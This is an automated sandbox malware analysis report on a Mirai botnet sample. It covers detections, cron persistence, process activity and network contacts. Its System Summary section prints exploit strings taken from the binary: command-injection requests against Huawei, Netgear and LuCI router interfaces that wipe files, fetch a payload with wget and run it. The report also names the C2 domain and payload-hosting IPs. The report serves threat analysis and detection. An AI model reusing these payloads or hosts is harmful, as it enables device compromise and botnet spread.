Edit tour

Linux Analysis Report
686i.elf

Overview

General Information

Sample name:686i.elf
Analysis ID:1642318
MD5:913fa2eba99db0a4e78a73ab6dec9da6
SHA1:a0229e60357b056aa9c89cc8cb1032e4039116b5
SHA256:af894b758b8edd357ce97f18694b405ca93c6c1e091f6d7457887530edc7c3ef
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:88
Range:0 - 100

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
HTTP GET or POST without a user agent
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1642318
Start date and time:2025-03-19 02:01:10 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 3s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:686i.elf
Detection:MAL
Classification:mal88.troj.linELF@0/1@1/0
  • VT rate limit hit for: conn.masjesu.zip
Command:/tmp/686i.elf
PID:6279
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:no crontab for root
  • system is lnxubuntu20
  • dash New Fork (PID: 6254, Parent: 4334)
  • rm (PID: 6254, Parent: 4334, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.snUMMXyMK3 /tmp/tmp.9Qhnz4zPF4 /tmp/tmp.6fTXHNmO0K
  • dash New Fork (PID: 6255, Parent: 4334)
  • rm (PID: 6255, Parent: 4334, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.snUMMXyMK3 /tmp/tmp.9Qhnz4zPF4 /tmp/tmp.6fTXHNmO0K
  • 686i.elf (PID: 6279, Parent: 6181, MD5: 913fa2eba99db0a4e78a73ab6dec9da6) Arguments: /tmp/686i.elf
    • 686i.elf New Fork (PID: 6280, Parent: 6279)
      • 686i.elf New Fork (PID: 6281, Parent: 6280)
      • sh (PID: 6281, Parent: 6280, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l"
        • sh New Fork (PID: 6282, Parent: 6281)
        • crontab (PID: 6282, Parent: 6281, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • 686i.elf New Fork (PID: 6283, Parent: 6280)
      • sh (PID: 6283, Parent: 6280, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -"
        • sh New Fork (PID: 6284, Parent: 6283)
        • crontab (PID: 6284, Parent: 6283, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
    • 686i.elf New Fork (PID: 6285, Parent: 6279)
      • 686i.elf New Fork (PID: 6286, Parent: 6285)
      • 686i.elf New Fork (PID: 6287, Parent: 6285)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
686i.elfJoeSecurity_Mirai_4Yara detected MiraiJoe Security
    686i.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      686i.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        686i.elfLinux_Trojan_Gafgyt_83715433unknownunknown
        • 0x17af:$a: 8B 45 08 88 10 FF 45 08 8B 45 08 0F B6 00 84 C0 75 DB C9 C3 55
        686i.elfLinux_Trojan_Tsunami_0fa3a6e9unknownunknown
        • 0x2747:$a: EC 8B 55 EC C1 FA 10 0F B7 45 EC 01 C2 89 55 EC 8B 45 EC C1
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 686i.elfReversingLabs: Detection: 64%
        Source: 686i.elfVirustotal: Detection: 58%Perma Link
        Source: global trafficHTTP traffic detected: GET /.shell HTTP/1.1Host: 37.44.238.88Connection: close
        Source: global trafficHTTP traffic detected: GET /.shell HTTP/1.1Host: 37.44.238.92Connection: close
        Source: /tmp/686i.elf (PID: 6285)Reads hosts file: /etc/hostsJump to behavior
        Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /.shell HTTP/1.1Host: 37.44.238.88Connection: close
        Source: global trafficHTTP traffic detected: GET /.shell HTTP/1.1Host: 37.44.238.92Connection: close
        Source: global trafficDNS traffic detected: DNS query: conn.masjesu.zip
        Source: 686i.elfString found in binary or memory: http://purenetworks.com/HNAP1/
        Source: 686i.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: 686i.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39256
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51798
        Source: unknownNetwork traffic detected: HTTP traffic on port 39256 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 44388 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44388
        Source: unknownNetwork traffic detected: HTTP traffic on port 51798 -> 443

        System Summary

        barindex
        Source: 686i.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_83715433 Author: unknown
        Source: 686i.elf, type: SAMPLEMatched rule: Linux_Trojan_Tsunami_0fa3a6e9 Author: unknown
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s -l /tmp/huawei -r /spim;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s -l /tmp/huawei -r /spim;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /UD/act?1 HTTP/1.1
        Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
        Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s/l7vmra;sh${IFS}/tmp/l7vmra&>r&&tar${IFS}/string.js HTTP/1.0
        Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
        Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s/spim;${IFS}sh${IFS}/var/tmp/spim
        Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
        Source: Initial samplePotential command found: GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F%s%2Fbins.sh%3B%20chmod%20777%20bins.sh%3B%20.%2Fbins.sh) HTTP/1.1
        Source: Initial samplePotential command found: GET /.shell HTTP/1.1
        Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s/spim;${IFS}sh${IFS}/var/tmp/spimGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s/l7vmra;chmod+777+l7vmra;/tmp/l7vmraGET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F%s%2Fbins.sh%3B%20chmod%20777%20bins.sh%3B%20.%2Fbins.sh) HTTP/1.1
        Source: 686i.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_83715433 reference_sample = 3648a407224634d76e82eceec84250a7506720a7f43a6ccf5873f478408fedba, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 25ac15f4b903d9e28653dad0db399ebd20d4e9baabf5078fbc33d3cd838dd7e9, id = 83715433-3dff-4238-8cdb-c51279565e05, last_modified = 2021-09-16
        Source: 686i.elf, type: SAMPLEMatched rule: Linux_Trojan_Tsunami_0fa3a6e9 reference_sample = 40a15a186373a062bfb476b37a73c61e1ba84e5fa57282a7f9ec0481860f372a, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Tsunami, fingerprint = fed796c5275e2e91c75dcdbf73d0c0ab37591115989312c6f6c5adcd138bc91f, id = 0fa3a6e9-89f3-4bc8-8dc1-e9ccbeeb836d, last_modified = 2021-09-16
        Source: classification engineClassification label: mal88.troj.linELF@0/1@1/0

        Persistence and Installation Behavior

        barindex
        Source: /bin/sh (PID: 6282)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
        Source: /bin/sh (PID: 6284)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
        Source: /usr/bin/crontab (PID: 6284)File: /var/spool/cron/crontabs/tmp.T9ZbwlJump to behavior
        Source: /usr/bin/crontab (PID: 6284)File: /var/spool/cron/crontabs/rootJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/6234/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1582/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/3088/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/230/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/110/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/231/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/111/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/232/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1579/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/112/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/233/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1699/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/113/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/234/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1335/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1698/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/114/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/235/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1334/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1576/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/2302/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/115/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/236/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/116/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/237/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/117/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/118/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/910/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/119/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/912/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/4723/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/10/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/2307/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/11/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/918/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/12/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/13/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/6243/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/14/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/6242/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/15/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/16/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/17/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/18/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1594/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/120/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/121/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1349/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/122/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/243/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/123/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/2/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/124/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/3/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/4/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/125/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/126/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1344/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1465/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1586/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/127/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/6/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/248/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/128/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/249/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1463/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/800/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/9/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/801/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/20/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/21/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1900/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/22/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/23/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/24/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/25/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/26/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/6256/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/27/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/28/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/6258/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/29/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/6257/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/491/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/250/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/130/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/251/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/252/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/132/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/253/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/254/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/255/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/256/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1599/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/257/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1477/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/379/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/258/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1476/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/259/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/1475/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/936/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/30/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6286)File opened: /proc/2208/cmdlineJump to behavior
        Source: /tmp/686i.elf (PID: 6281)Shell command executed: sh -c "crontab -l"Jump to behavior
        Source: /tmp/686i.elf (PID: 6283)Shell command executed: sh -c "crontab -"Jump to behavior
        Source: /usr/bin/dash (PID: 6254)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.snUMMXyMK3 /tmp/tmp.9Qhnz4zPF4 /tmp/tmp.6fTXHNmO0KJump to behavior
        Source: /usr/bin/dash (PID: 6255)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.snUMMXyMK3 /tmp/tmp.9Qhnz4zPF4 /tmp/tmp.6fTXHNmO0KJump to behavior
        Source: submitted sampleStderr: no crontab for root: exit code = 0

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 686i.elf, type: SAMPLE

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 686i.elf, type: SAMPLE
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        Valid Accounts1
        Command and Scripting Interpreter
        1
        Scheduled Task/Job
        1
        Scheduled Task/Job
        1
        File Deletion
        1
        OS Credential Dumping
        1
        File and Directory Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Scheduled Task/Job
        1
        Scripting
        Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1642318 Sample: 686i.elf Startdate: 19/03/2025 Architecture: LINUX Score: 88 33 109.202.202.202, 80 INIT7CH Switzerland 2->33 35 37.44.238.88, 443, 44388, 53394 HARMONYHOSTING-ASFR France 2->35 37 3 other IPs or domains 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 Yara detected Mirai 2->43 9 dash rm 686i.elf 2->9         started        11 dash rm 2->11         started        signatures3 process4 process5 13 686i.elf 9->13         started        15 686i.elf 9->15         started        process6 17 686i.elf sh 13->17         started        19 686i.elf sh 13->19         started        21 686i.elf 15->21         started        23 686i.elf 15->23         started        process7 25 sh crontab 17->25         started        29 sh crontab 19->29         started        file8 31 /var/spool/cron/crontabs/tmp.T9Zbwl, ASCII 25->31 dropped 45 Sample tries to persist itself using cron 25->45 47 Executes the "crontab" command typically for achieving persistence 25->47 signatures9

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        686i.elf65%ReversingLabsLinux.Trojan.Mirai
        686i.elf58%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://37.44.238.88/.shell100%Avira URL Cloudmalware
        http://37.44.238.92/.shell100%Avira URL Cloudmalware

        Download Network PCAP: filteredfull

        NameIPActiveMaliciousAntivirus DetectionReputation
        conn.masjesu.zip
        37.44.238.92
        truefalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://37.44.238.92/.shellfalse
          • Avira URL Cloud: malware
          unknown
          http://37.44.238.88/.shellfalse
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://schemas.xmlsoap.org/soap/encoding/686i.elffalse
            high
            http://purenetworks.com/HNAP1/686i.elffalse
              high
              http://schemas.xmlsoap.org/soap/envelope/686i.elffalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                37.44.238.92
                conn.masjesu.zipFrance
                49434HARMONYHOSTING-ASFRfalse
                34.249.145.219
                unknownUnited States
                16509AMAZON-02USfalse
                109.202.202.202
                unknownSwitzerland
                13030INIT7CHfalse
                37.44.238.88
                unknownFrance
                49434HARMONYHOSTING-ASFRfalse
                91.189.91.42
                unknownUnited Kingdom
                41231CANONICAL-ASGBfalse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                37.44.238.92l7vmra.elfGet hashmaliciousMiraiBrowse
                • 37.44.238.92/.shell
                34.249.145.219boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                  na.elfGet hashmaliciousPrometeiBrowse
                    na.elfGet hashmaliciousPrometeiBrowse
                      na.elfGet hashmaliciousPrometeiBrowse
                        sync.arm7.elfGet hashmaliciousUnknownBrowse
                          na.elfGet hashmaliciousPrometeiBrowse
                            na.elfGet hashmaliciousPrometeiBrowse
                              main_ppc.elfGet hashmaliciousMiraiBrowse
                                main_arm6.elfGet hashmaliciousMiraiBrowse
                                  main_sh4.elfGet hashmaliciousMiraiBrowse
                                    109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                    • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                    91.189.91.42boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                      boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                        boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                          na.elfGet hashmaliciousPrometeiBrowse
                                            FederalmipsAgent.elfGet hashmaliciousMiraiBrowse
                                              na.elfGet hashmaliciousPrometeiBrowse
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                    Sakura.sh.binGet hashmaliciousUnknownBrowse
                                                      GwRba1mTFR.elfGet hashmaliciousUnknownBrowse
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        conn.masjesu.zipl7vmra.elfGet hashmaliciousMiraiBrowse
                                                        • 77.90.153.218
                                                        LkUJU0rsxdoNTRjxlZ5e0rZRO3rOY4rKRo.elfGet hashmaliciousMiraiBrowse
                                                        • 216.126.231.240
                                                        doQQmLpWCXK3TF48O7pZ2ayjzBZWAPU7nH.elfGet hashmaliciousMiraiBrowse
                                                        • 87.120.84.230
                                                        wsaySOikSR3afBEBBbLelehAkQc8MFUcQx.elfGet hashmaliciousMiraiBrowse
                                                        • 216.126.231.240
                                                        m1TuocfCMhon01ZDYjxrTEWsmYdVD8FZ4k.elfGet hashmaliciousMiraiBrowse
                                                        • 216.126.231.240
                                                        k1l22Z6gKgXPE1tN9Ynyy0WNW15Tg2eA44.elfGet hashmaliciousMiraiBrowse
                                                        • 216.126.231.240
                                                        Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfGet hashmaliciousMiraiBrowse
                                                        • 87.120.84.230
                                                        CP0BHTY83T9LhjWEQcsk2nqqVKWqC0ETyy.elfGet hashmaliciousMiraiBrowse
                                                        • 87.120.84.230
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        HARMONYHOSTING-ASFRgigab.arm5.elfGet hashmaliciousUnknownBrowse
                                                        • 37.44.238.66
                                                        gigab.mips.elfGet hashmaliciousUnknownBrowse
                                                        • 37.44.238.66
                                                        l7vmra.elfGet hashmaliciousMiraiBrowse
                                                        • 37.44.238.92
                                                        gigab.mips.elfGet hashmaliciousGafgytBrowse
                                                        • 37.44.238.66
                                                        gigab.spc.elfGet hashmaliciousGafgytBrowse
                                                        • 37.44.238.66
                                                        gigab.arm5.elfGet hashmaliciousGafgytBrowse
                                                        • 37.44.238.66
                                                        gigab.arm4.elfGet hashmaliciousGafgytBrowse
                                                        • 37.44.238.66
                                                        gigab.x86.elfGet hashmaliciousGafgytBrowse
                                                        • 37.44.238.66
                                                        gigab.ppc.elfGet hashmaliciousGafgytBrowse
                                                        • 37.44.238.66
                                                        gigab.sh4.elfGet hashmaliciousGafgytBrowse
                                                        • 37.44.238.66
                                                        CANONICAL-ASGBboatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 91.189.91.42
                                                        boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                        • 91.189.91.42
                                                        boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                        • 91.189.91.42
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 91.189.91.42
                                                        FederalmipsAgent.elfGet hashmaliciousMiraiBrowse
                                                        • 91.189.91.42
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 91.189.91.42
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 91.189.91.42
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 91.189.91.42
                                                        Sakura.sh.binGet hashmaliciousUnknownBrowse
                                                        • 91.189.91.42
                                                        https://paste.ubuntu.com/p/2xjw98FbQJGet hashmaliciousUnknownBrowse
                                                        • 185.125.188.23
